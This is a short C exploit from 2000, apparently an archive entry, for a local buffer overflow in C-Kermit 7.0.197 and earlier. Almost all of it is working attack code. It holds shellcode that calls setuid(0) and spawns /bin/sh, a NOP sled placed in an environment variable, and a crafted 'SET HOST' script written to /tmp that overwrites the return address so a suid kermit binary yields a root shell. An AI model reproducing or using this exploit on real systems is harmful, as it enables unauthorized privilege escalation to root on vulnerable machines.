C-Kermit local exploit. Versions 7.0.197 and below are vulnerable. Tested on Slackware 7, where it is not suid. It is suid on Olivetti X/OS R2.3, 3.x.
b1c58ec5e7f44694f976de55f2766d8a2088c17241a91eff5815c66be7258e40
/*
* C-Kermit local exploit.
* Versions: 7.0.197 (Maybe others).
* Available at: www.columbia.edu/kermit/
*
* By: Cody Tubbs (loophole of hhp).
* shouts to v9. :), *icesk, rpc, tgb,
* syscon, houston peeps, meta`, duke,
* ism, blkforge, sk8, and #hhp.
*
* Date: 9/19/2000.
* Web: www.hhp-programming.net
* Mail: pigspigs@yahoo.com
*
* Tested on slack7.
* non s*id by default on linux.
* [suid on Olivetti X/OS R2.3, 3.x]
*
* .. ribbit.. . ribbit.. . ribbit.. SPLAT!.
*******************************************/
#include <stdio.h>
#define OFFSET -5000 // Tested on slack7.
#define NOP 0x90
#define TMP "/tmp/.kerm"
#define DBUF 1200
static char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
"\xe8\xdc\xff\xff\xff/bin/sh\x69";
long get_sp(void){
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]){
char eipeip[DBUF], buffer[4096];
int i, offset;
FILE *ribbit;
long address;
if(argc > 1){
offset = atoi(argv[1]);
}else{
offset = OFFSET;
}
address = get_sp() - offset;
for(i = 0 ; i < DBUF ; i += 4){
*(long *)&eipeip[i] = address;
}
for( i = 0 ; i < (4096 - strlen(shellcode) - strlen(eipeip)) ; i++){
buffer[i] = NOP;
}
memcpy(buffer + i, shellcode, strlen(shellcode));
memcpy(buffer, "RIBBIT=", 7); // Using env var due to command
putenv(buffer); // line shellcode char(hotkey)
// truncate problems.
fprintf(stderr, "Return address %#x, offset: %d.\n", address, offset);
unlink(TMP);
ribbit = fopen(TMP, "w");
fprintf(ribbit, "SET HOST %s\n", eipeip);
fclose(ribbit);
execlp("/usr/local/bin/kermit", "kermit", TMP, 0);
}